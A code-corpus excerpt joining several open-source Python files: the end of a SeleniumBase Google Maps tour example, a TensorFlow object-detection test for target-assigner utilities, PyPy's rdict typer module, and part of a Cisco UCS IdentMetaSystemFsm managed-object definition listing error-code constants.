"#searchbox-searchbutton", alignment="bottom")
self.add_tour_step("Or click here to get driving directions.",
"#searchbox-directions", alignment="bottom")
self.add_tour_step("Use this button to switch to Satellite view.",
"#minimap div.widget-minimap", alignment="right")
self.add_tour_step("Click here to zoom in.",
"#widget-zoom-in", alignment="left")
self.add_tour_step("Or click here to zoom out.",
"#widget-zoom-out", alignment="left")
self.add_tour_step("Use the Menu button to see more options.",
".searchbox-hamburger-container", alignment="right")
self.add_tour_step("Or click here to see more Google apps.",
'[title="Google apps"]', alignment="left")
self.add_tour_step("Thanks for using SeleniumBase Tours!",
title="End of Guided Tour")
self.export_tour() # The default name for exports is "my_tour.js"
self.play_tour()
| examples/tour_examples/google_tour.py | 3,274 | Create a website tour using the ShepherdJS library with "dark" theme Same as: self.create_shepherd_tour(theme="dark") Wait for autocomplete Create a website tour using the ShepherdJS library with "light" theme Same as: self.create_shepherd_tour(theme="light") Create a website tour using the Bootstrap Tour JS library Same as: self.create_bootstrap_tour() Tour automatically continues after 5 sec Create a website tour using the IntroJS library Same as: self.create_introjs_tour() The default name for exports is "my_tour.js" | 529 | en | 0.565826 |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utils.target_assigner_utils."""
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.utils import target_assigner_utils as ta_utils
from object_detection.utils import test_case
class TargetUtilTest(parameterized.TestCase, test_case.TestCase):
def test_image_shape_to_grids(self):
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=2, width=3)
return y_grid, x_grid
expected_y_grid = np.array([[0, 0, 0], [1, 1, 1]])
expected_x_grid = np.array([[0, 1, 2], [0, 1, 2]])
y_grid, x_grid = self.execute(graph_fn, [])
np.testing.assert_array_equal(y_grid, expected_y_grid)
np.testing.assert_array_equal(x_grid, expected_x_grid)
@parameterized.parameters((False,), (True,))
def test_coordinates_to_heatmap(self, sparse):
if not hasattr(tf, 'tensor_scatter_nd_max'):
self.skipTest('Cannot test function due to old TF version.')
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=3, width=5)
y_coordinates = tf.constant([1.5, 0.5], dtype=tf.float32)
x_coordinates = tf.constant([2.5, 4.5], dtype=tf.float32)
sigma = tf.constant([0.1, 0.5], dtype=tf.float32)
channel_onehot = tf.constant([[1, 0, 0], [0, 1, 0]], dtype=tf.float32)
channel_weights = tf.constant([1, 1], dtype=tf.float32)
heatmap = ta_utils.coordinates_to_heatmap(y_grid, x_grid, y_coordinates,
x_coordinates, sigma,
channel_onehot,
channel_weights, sparse=sparse)
return heatmap
heatmap = self.execute(graph_fn, [])
# Peak at (1, 2) for the first class.
self.assertAlmostEqual(1.0, heatmap[1, 2, 0])
# Peak at (0, 4) for the second class.
self.assertAlmostEqual(1.0, heatmap[0, 4, 1])
def test_compute_floor_offsets_with_indices_onlysource(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[0.5, 0.5], [0.3, 0.2]]))
np.testing.assert_array_almost_equal(indices,
np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_and_targets(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[1.1, -0.8], [0.1, 0.5]]))
np.testing.assert_array_almost_equal(indices, np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_multisources(self):
def graph_fn():
y_source = tf.constant([[1.0, 0.0], [2.0, 3.0]], dtype=tf.float32)
x_source = tf.constant([[2.0, 4.0], [3.0, 3.0]], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
# Offset from the first source to target.
np.testing.assert_array_almost_equal(offsets[:, 0, :],
np.array([[1.1, -0.8], [-1.9, 1.5]]))
# Offset from the second source to target.
np.testing.assert_array_almost_equal(offsets[:, 1, :],
np.array([[2.1, -2.8], [-2.9, 1.5]]))
# Indices from the first source to target.
np.testing.assert_array_almost_equal(indices[:, 0, :],
np.array([[1, 2], [2, 3]]))
# Indices from the second source to target.
np.testing.assert_array_almost_equal(indices[:, 1, :],
np.array([[0, 4], [3, 3]]))
def test_get_valid_keypoints_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_mask = np.array([[0, 1], [0, 0], [1, 0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_get_valid_keypoints_with_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
weights = tf.constant([0.0, 0.0, 1.0])
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
class_weights=weights,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
expected_mask = np.array([[0, 0], [0, 0], [1, 0]])
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_blackout_pixel_weights_by_box_regions(self):
def graph_fn():
boxes = tf.constant(
[[0.0, 0.0, 5, 5], [0.0, 0.0, 10.0, 20.0], [6.0, 12.0, 8.0, 18.0]],
dtype=tf.float32)
blackout = tf.constant([True, False, True], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# All zeros in region [0:6, 0:6].
self.assertAlmostEqual(np.sum(output[0:6, 0:6]), 0.0)
# All zeros in region [12:19, 6:9].
self.assertAlmostEqual(np.sum(output[6:9, 12:19]), 0.0)
# All other pixel weights should be 1.0.
# 20 * 10 - 6 * 6 - 3 * 7 = 143.0
self.assertAlmostEqual(np.sum(output), 143.0)
def test_blackout_pixel_weights_by_box_regions_zero_instance(self):
def graph_fn():
boxes = tf.zeros([0, 4], dtype=tf.float32)
blackout = tf.zeros([0], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# The output should be all 1s since there's no annotation provided.
np.testing.assert_array_equal(output, np.ones([10, 20], dtype=np.float32))
def test_get_surrounding_grids(self):
def graph_fn():
y_coordinates = tf.constant([0.5], dtype=tf.float32)
x_coordinates = tf.constant([4.5], dtype=tf.float32)
output = ta_utils.get_surrounding_grids(
height=3,
width=5,
y_coordinates=y_coordinates,
x_coordinates=x_coordinates,
radius=1)
return output
y_indices, x_indices, valid = self.execute(graph_fn, [])
# Five neighboring indices: [-1, 4] (out of bound), [0, 3], [0, 4],
# [0, 5] (out of bound), [1, 4].
np.testing.assert_array_almost_equal(
y_indices,
np.array([[0.0, 0.0, 0.0, 0.0, 1.0]]))
np.testing.assert_array_almost_equal(
x_indices,
np.array([[0.0, 3.0, 4.0, 0.0, 4.0]]))
self.assertAllEqual(valid, [[False, True, True, False, True]])
if __name__ == '__main__':
tf.test.main()
| object_detection/utils/target_assigner_utils_test.py | 10,334 | Tests for utils.target_assigner_utils.
Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== Peak at (1, 2) for the first class. Peak at (0, 4) for the second class. Offset from the first source to target. Offset from the second source to target. Indices from the first source to target. Indices from the second source to target. All zeros in region [0:6, 0:6]. All zeros in region [12:19, 6:9]. All other pixel weights should be 1.0. 20 * 10 - 6 * 6 - 3 * 7 = 143.0 The output should be all 1s since there's no annotation provided. Five neighboring indices: [-1, 4] (out of bound), [0, 3], [0, 4], [0, 5] (out of bound), [1, 4]. | 1,238 | en | 0.837674 |
from pypy.tool.pairtype import pairtype
from pypy.annotation import model as annmodel
from pypy.objspace.flow.model import Constant
from pypy.rpython.lltypesystem import lltype
from pypy.rlib.rarithmetic import r_uint
from pypy.rlib.objectmodel import hlinvoke
from pypy.rpython import robject
from pypy.rlib import objectmodel
from pypy.rpython import rmodel
class __extend__(annmodel.SomeDict):
def rtyper_makerepr(self, rtyper):
dictkey = self.dictdef.dictkey
dictvalue = self.dictdef.dictvalue
s_key = dictkey .s_value
s_value = dictvalue.s_value
force_non_null = self.dictdef.force_non_null
if (s_key.__class__ is annmodel.SomeObject and s_key.knowntype == object and
s_value.__class__ is annmodel.SomeObject and s_value.knowntype == object):
return robject.pyobj_repr
else:
if dictkey.custom_eq_hash:
custom_eq_hash = lambda: (rtyper.getrepr(dictkey.s_rdict_eqfn),
rtyper.getrepr(dictkey.s_rdict_hashfn))
else:
custom_eq_hash = None
return rtyper.type_system.rdict.DictRepr(rtyper,
lambda: rtyper.getrepr(s_key),
lambda: rtyper.getrepr(s_value),
dictkey,
dictvalue,
custom_eq_hash,
force_non_null)
def rtyper_makekey(self):
self.dictdef.dictkey .dont_change_any_more = True
self.dictdef.dictvalue.dont_change_any_more = True
return (self.__class__, self.dictdef.dictkey, self.dictdef.dictvalue)
class AbstractDictRepr(rmodel.Repr):
def pickrepr(self, item_repr):
if self.custom_eq_hash:
return item_repr, item_repr
else:
return self._externalvsinternal(self.rtyper, item_repr)
pickkeyrepr = pickrepr
def compact_repr(self):
return 'DictR %s %s' % (self.key_repr.compact_repr(), self.value_repr.compact_repr())
def recast_value(self, llops, v):
return llops.convertvar(v, self.value_repr, self.external_value_repr)
def recast_key(self, llops, v):
return llops.convertvar(v, self.key_repr, self.external_key_repr)
def rtype_newdict(hop):
hop.inputargs() # no arguments expected
r_dict = hop.r_result
if r_dict == robject.pyobj_repr: # special case: SomeObject: SomeObject dicts!
cdict = hop.inputconst(robject.pyobj_repr, dict)
return hop.genop('simple_call', [cdict], resulttype = robject.pyobj_repr)
cDICT = hop.inputconst(lltype.Void, r_dict.DICT)
v_result = hop.gendirectcall(hop.rtyper.type_system.rdict.ll_newdict, cDICT)
return v_result
class AbstractDictIteratorRepr(rmodel.IteratorRepr):
def newiter(self, hop):
v_dict, = hop.inputargs(self.r_dict)
citerptr = hop.inputconst(lltype.Void, self.lowleveltype)
return hop.gendirectcall(self.ll_dictiter, citerptr, v_dict)
def rtype_next(self, hop):
variant = self.variant
v_iter, = hop.inputargs(self)
if variant in ('keys', 'values'):
c1 = hop.inputconst(lltype.Void, None)
else:
c1 = hop.inputconst(lltype.Void, hop.r_result.lowleveltype)
# record that we know about these two possible exceptions
hop.has_implicit_exception(StopIteration)
hop.has_implicit_exception(RuntimeError)
hop.exception_is_here()
v = hop.gendirectcall(self.ll_dictnext, c1, v_iter)
if variant == 'keys':
return self.r_dict.recast_key(hop.llops, v)
elif variant == 'values':
return self.r_dict.recast_value(hop.llops, v)
else:
return v
| pypy/rpython/rdict.py | 3,957 | no arguments expected special case: SomeObject: SomeObject dicts! record that we know about these two possible exceptions | 121 | en | 0.827779 |
"""This module contains the general information for IdentMetaSystemFsm ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class IdentMetaSystemFsmConsts:
COMPLETION_TIME_ = ""
CURRENT_FSM_NOP = "nop"
CURRENT_FSM_SYNC = "sync"
CURRENT_FSM_UCSC_UNIV_SYNC = "ucscUnivSync"
FSM_STATUS_FAIL = "fail"
FSM_STATUS_IN_PROGRESS = "inProgress"
FSM_STATUS_NOP = "nop"
FSM_STATUS_PENDING = "pending"
FSM_STATUS_SKIP = "skip"
FSM_STATUS_SUCCESS = "success"
FSM_STATUS_THROTTLED = "throttled"
RMT_ERR_CODE_ERR_2FA_AUTH_RETRY = "ERR-2fa-auth-retry"
RMT_ERR_CODE_ERR_ACTIVATE_FAILED = "ERR-ACTIVATE-failed"
RMT_ERR_CODE_ERR_ACTIVATE_IN_PROGRESS = "ERR-ACTIVATE-in-progress"
RMT_ERR_CODE_ERR_ACTIVATE_RETRY = "ERR-ACTIVATE-retry"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_BIOS = "ERR-BIOS-TOKENS-OLD-BIOS"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_CIMC = "ERR-BIOS-TOKENS-OLD-CIMC"
RMT_ERR_CODE_ERR_BIOS_NETWORK_BOOT_ORDER_NOT_FOUND = "ERR-BIOS-network-boot-order-not-found"
RMT_ERR_CODE_ERR_BOARDCTRLUPDATE_IGNORE = "ERR-BOARDCTRLUPDATE-ignore"
RMT_ERR_CODE_ERR_DIAG_CANCELLED = "ERR-DIAG-cancelled"
RMT_ERR_CODE_ERR_DIAG_FSM_RESTARTED = "ERR-DIAG-fsm-restarted"
RMT_ERR_CODE_ERR_DIAG_TEST_FAILED = "ERR-DIAG-test-failed"
RMT_ERR_CODE_ERR_DNLD_AUTHENTICATION_FAILURE = "ERR-DNLD-authentication-failure"
RMT_ERR_CODE_ERR_DNLD_HOSTKEY_MISMATCH = "ERR-DNLD-hostkey-mismatch"
RMT_ERR_CODE_ERR_DNLD_INVALID_IMAGE = "ERR-DNLD-invalid-image"
RMT_ERR_CODE_ERR_DNLD_NO_FILE = "ERR-DNLD-no-file"
RMT_ERR_CODE_ERR_DNLD_NO_SPACE = "ERR-DNLD-no-space"
RMT_ERR_CODE_ERR_DNLD_USB_UNMOUNTED = "ERR-DNLD-usb-unmounted"
RMT_ERR_CODE_ERR_DNS_DELETE_ERROR = "ERR-DNS-delete-error"
RMT_ERR_CODE_ERR_DNS_GET_ERROR = "ERR-DNS-get-error"
RMT_ERR_CODE_ERR_DNS_SET_ERROR = "ERR-DNS-set-error"
RMT_ERR_CODE_ERR_DIAGNOSTICS_IN_PROGRESS = "ERR-Diagnostics-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_MEMTEST_IN_PROGRESS = "ERR-Diagnostics-memtest-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_NETWORK_IN_PROGRESS = "ERR-Diagnostics-network-in-progress"
RMT_ERR_CODE_ERR_FILTER_ILLEGAL_FORMAT = "ERR-FILTER-illegal-format"
RMT_ERR_CODE_ERR_FSM_NO_SUCH_STATE = "ERR-FSM-no-such-state"
RMT_ERR_CODE_ERR_HOST_FRU_IDENTITY_MISMATCH = "ERR-HOST-fru-identity-mismatch"
RMT_ERR_CODE_ERR_HTTP_SET_ERROR = "ERR-HTTP-set-error"
RMT_ERR_CODE_ERR_HTTPS_SET_ERROR = "ERR-HTTPS-set-error"
RMT_ERR_CODE_ERR_IBMC_ANALYZE_RESULTS = "ERR-IBMC-analyze-results"
RMT_ERR_CODE_ERR_IBMC_CONNECT_ERROR = "ERR-IBMC-connect-error"
RMT_ERR_CODE_ERR_IBMC_CONNECTOR_INFO_RETRIEVAL_ERROR = "ERR-IBMC-connector-info-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_FRU_RETRIEVAL_ERROR = "ERR-IBMC-fru-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_INVALID_END_POINT_CONFIG = "ERR-IBMC-invalid-end-point-config"
RMT_ERR_CODE_ERR_IBMC_RESULTS_NOT_READY = "ERR-IBMC-results-not-ready"
RMT_ERR_CODE_ERR_MAX_SUBSCRIPTIONS_ALLOWED_ERROR = "ERR-MAX-subscriptions-allowed-error"
RMT_ERR_CODE_ERR_MO_CONFIG_CHILD_OBJECT_CANT_BE_CONFIGURED = "ERR-MO-CONFIG-child-object-cant-be-configured"
RMT_ERR_CODE_ERR_MO_META_NO_SUCH_OBJECT_CLASS = "ERR-MO-META-no-such-object-class"
RMT_ERR_CODE_ERR_MO_PROPERTY_NO_SUCH_PROPERTY = "ERR-MO-PROPERTY-no-such-property"
RMT_ERR_CODE_ERR_MO_PROPERTY_VALUE_OUT_OF_RANGE = "ERR-MO-PROPERTY-value-out-of-range"
RMT_ERR_CODE_ERR_MO_ACCESS_DENIED = "ERR-MO-access-denied"
RMT_ERR_CODE_ERR_MO_DELETION_RULE_VIOLATION = "ERR-MO-deletion-rule-violation"
RMT_ERR_CODE_ERR_MO_DUPLICATE_OBJECT = "ERR-MO-duplicate-object"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CONTAINMENT = "ERR-MO-illegal-containment"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CREATION = "ERR-MO-illegal-creation"
RMT_ERR_CODE_ERR_MO_ILLEGAL_ITERATOR_STATE = "ERR-MO-illegal-iterator-state"
RMT_ERR_CODE_ERR_MO_ILLEGAL_OBJECT_LIFECYCLE_TRANSITION = "ERR-MO-illegal-object-lifecycle-transition"
RMT_ERR_CODE_ERR_MO_NAMING_RULE_VIOLATION = "ERR-MO-naming-rule-violation"
RMT_ERR_CODE_ERR_MO_OBJECT_NOT_FOUND = "ERR-MO-object-not-found"
RMT_ERR_CODE_ERR_MO_RESOURCE_ALLOCATION = "ERR-MO-resource-allocation"
RMT_ERR_CODE_ERR_NTP_DELETE_ERROR = "ERR-NTP-delete-error"
RMT_ERR_CODE_ERR_NTP_GET_ERROR = "ERR-NTP-get-error"
RMT_ERR_CODE_ERR_NTP_SET_ERROR = "ERR-NTP-set-error"
RMT_ERR_CODE_ERR_POWER_CAP_UNSUPPORTED = "ERR-POWER-CAP-UNSUPPORTED"
RMT_ERR_CODE_ERR_POWER_PROFILE_IN_PROGRESS = "ERR-POWER-PROFILE-IN-PROGRESS"
RMT_ERR_CODE_ERR_SERVER_MIS_CONNECT = "ERR-SERVER-mis-connect"
RMT_ERR_CODE_ERR_SWITCH_INVALID_IF_CONFIG = "ERR-SWITCH-invalid-if-config"
RMT_ERR_CODE_ERR_TOKEN_REQUEST_DENIED = "ERR-TOKEN-request-denied"
RMT_ERR_CODE_ERR_UNABLE_TO_FETCH_BIOS_SETTINGS = "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS"
RMT_ERR_CODE_ERR_UPDATE_FAILED = "ERR-UPDATE-failed"
RMT_ERR_CODE_ERR_UPDATE_IN_PROGRESS = "ERR-UPDATE-in-progress"
RMT_ERR_CODE_ERR_UPDATE_RETRY = "ERR-UPDATE-retry"
RMT_ERR_CODE_ERR_AAA_CONFIG_MODIFY_ERROR = "ERR-aaa-config-modify-error"
RMT_ERR_CODE_ERR_ACCT_REALM_SET_ERROR = "ERR-acct-realm-set-error"
RMT_ERR_CODE_ERR_ADMIN_PASSWD_SET = "ERR-admin-passwd-set"
RMT_ERR_CODE_ERR_AUTH_ISSUE = "ERR-auth-issue"
RMT_ERR_CODE_ERR_AUTH_REALM_GET_ERROR = "ERR-auth-realm-get-error"
RMT_ERR_CODE_ERR_AUTH_REALM_SET_ERROR = "ERR-auth-realm-set-error"
RMT_ERR_CODE_ERR_AUTHENTICATION = "ERR-authentication"
RMT_ERR_CODE_ERR_AUTHORIZATION_REQUIRED = "ERR-authorization-required"
RMT_ERR_CODE_ERR_CLI_SESSION_LIMIT_REACHED = "ERR-cli-session-limit-reached"
RMT_ERR_CODE_ERR_CREATE_KEYRING = "ERR-create-keyring"
RMT_ERR_CODE_ERR_CREATE_LOCALE = "ERR-create-locale"
RMT_ERR_CODE_ERR_CREATE_ROLE = "ERR-create-role"
RMT_ERR_CODE_ERR_CREATE_TP = "ERR-create-tp"
RMT_ERR_CODE_ERR_CREATE_USER = "ERR-create-user"
RMT_ERR_CODE_ERR_DELETE_LOCALE = "ERR-delete-locale"
RMT_ERR_CODE_ERR_DELETE_ROLE = "ERR-delete-role"
RMT_ERR_CODE_ERR_DELETE_SESSION = "ERR-delete-session"
RMT_ERR_CODE_ERR_DELETE_USER = "ERR-delete-user"
RMT_ERR_CODE_ERR_DOWNGRADE_FAIL = "ERR-downgrade-fail"
RMT_ERR_CODE_ERR_EFI_DIAGNOSTICS_IN_PROGRESS = "ERR-efi-Diagnostics--in-progress"
RMT_ERR_CODE_ERR_ENABLE_MGMT_CONN = "ERR-enable-mgmt-conn"
RMT_ERR_CODE_ERR_EP_SET_ERROR = "ERR-ep-set-error"
RMT_ERR_CODE_ERR_GET_MAX_HTTP_USER_SESSIONS = "ERR-get-max-http-user-sessions"
RMT_ERR_CODE_ERR_HTTP_INITIALIZING = "ERR-http-initializing"
RMT_ERR_CODE_ERR_INSUFFICIENTLY_EQUIPPED = "ERR-insufficiently-equipped"
RMT_ERR_CODE_ERR_INTERNAL_ERROR = "ERR-internal-error"
RMT_ERR_CODE_ERR_LDAP_DELETE_ERROR = "ERR-ldap-delete-error"
RMT_ERR_CODE_ERR_LDAP_GET_ERROR = "ERR-ldap-get-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_MODIFY_ERROR = "ERR-ldap-group-modify-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_SET_ERROR = "ERR-ldap-group-set-error"
RMT_ERR_CODE_ERR_LDAP_SET_ERROR = "ERR-ldap-set-error"
RMT_ERR_CODE_ERR_LOCALE_SET_ERROR = "ERR-locale-set-error"
RMT_ERR_CODE_ERR_MAX_USERID_SESSIONS_REACHED = "ERR-max-userid-sessions-reached"
RMT_ERR_CODE_ERR_MISSING_METHOD = "ERR-missing-method"
RMT_ERR_CODE_ERR_MODIFY_LOCALE = "ERR-modify-locale"
RMT_ERR_CODE_ERR_MODIFY_ROLE = "ERR-modify-role"
RMT_ERR_CODE_ERR_MODIFY_USER = "ERR-modify-user"
RMT_ERR_CODE_ERR_MODIFY_USER_LOCALE = "ERR-modify-user-locale"
RMT_ERR_CODE_ERR_MODIFY_USER_ROLE = "ERR-modify-user-role"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_MODIFY_ERROR = "ERR-provider-group-modify-error"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_SET_ERROR = "ERR-provider-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_GET_ERROR = "ERR-radius-get-error"
RMT_ERR_CODE_ERR_RADIUS_GLOBAL_SET_ERROR = "ERR-radius-global-set-error"
RMT_ERR_CODE_ERR_RADIUS_GROUP_SET_ERROR = "ERR-radius-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_SET_ERROR = "ERR-radius-set-error"
RMT_ERR_CODE_ERR_REQUEST_TIMEOUT = "ERR-request-timeout"
RMT_ERR_CODE_ERR_RESET_ADAPTER = "ERR-reset-adapter"
RMT_ERR_CODE_ERR_ROLE_SET_ERROR = "ERR-role-set-error"
RMT_ERR_CODE_ERR_SECONDARY_NODE = "ERR-secondary-node"
RMT_ERR_CODE_ERR_SERVICE_NOT_READY = "ERR-service-not-ready"
RMT_ERR_CODE_ERR_SESSION_CACHE_FULL = "ERR-session-cache-full"
RMT_ERR_CODE_ERR_SESSION_NOT_FOUND = "ERR-session-not-found"
RMT_ERR_CODE_ERR_SET_KEY_CERT = "ERR-set-key-cert"
RMT_ERR_CODE_ERR_SET_LOGIN_PROFILE = "ERR-set-login-profile"
RMT_ERR_CODE_ERR_SET_MIN_PASSPHRASE_LENGTH = "ERR-set-min-passphrase-length"
RMT_ERR_CODE_ERR_SET_NETWORK = "ERR-set-network"
RMT_ERR_CODE_ERR_SET_PASSWORD_STRENGTH_CHECK = "ERR-set-password-strength-check"
RMT_ERR_CODE_ERR_SET_PORT_CHANNEL = "ERR-set-port-channel"
RMT_ERR_CODE_ERR_STORE_PRE_LOGIN_BANNER_MSG = "ERR-store-pre-login-banner-msg"
RMT_ERR_CODE_ERR_TACACS_ENABLE_ERROR = "ERR-tacacs-enable-error"
RMT_ERR_CODE_ERR_TACACS_GLOBAL_SET_ERROR = "ERR-tacacs-global-set-error"
RMT_ERR_CODE_ERR_TACACS_GROUP_SET_ERROR = "ERR-tacacs-group-set-error"
RMT_ERR_CODE_ERR_TACACS_PLUS_GET_ERROR = "ERR-tacacs-plus-get-error"
RMT_ERR_CODE_ERR_TACACS_SET_ERROR = "ERR-tacacs-set-error"
RMT_ERR_CODE_ERR_TEST_ERROR_1 = "ERR-test-error-1"
RMT_ERR_CODE_ERR_TEST_ERROR_2 = "ERR-test-error-2"
RMT_ERR_CODE_ERR_TIMEZONE_SET_ERROR = "ERR-timezone-set-error"
RMT_ERR_CODE_ERR_USER_ACCOUNT_EXPIRED = "ERR-user-account-expired"
RMT_ERR_CODE_ERR_USER_PASSWD_EXPIRED = "ERR-user-passwd-expired"
RMT_ERR_CODE_ERR_USER_SET_ERROR = "ERR-user-set-error"
RMT_ERR_CODE_ERR_XML_PARSE_ERROR = "ERR-xml-parse-error"
RMT_ERR_CODE_NONE = "none"
class IdentMetaSystemFsm(ManagedObject):
"""This is IdentMetaSystemFsm class."""
consts = IdentMetaSystemFsmConsts()
naming_props = set([])
mo_meta = MoMeta("IdentMetaSystemFsm", "identMetaSystemFsm", "fsm", VersionMeta.Version211a, "OutputOnly", 0xf, [], [""], ['identMetaSystem'], ['identMetaSystemFsmStage'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"completion_time": MoPropertyMeta("completion_time", "completionTime", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [""], []),
"current_fsm": MoPropertyMeta("current_fsm", "currentFsm", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["nop", "sync", "ucscUnivSync"], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"fsm_status": MoPropertyMeta("fsm_status", "fsmStatus", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, None, ["fail", "inProgress", "nop", "pending", "skip", "success", "throttled"], []),
"instance_id": MoPropertyMeta("instance_id", "instanceId", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "byte", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], ["0-100"]),
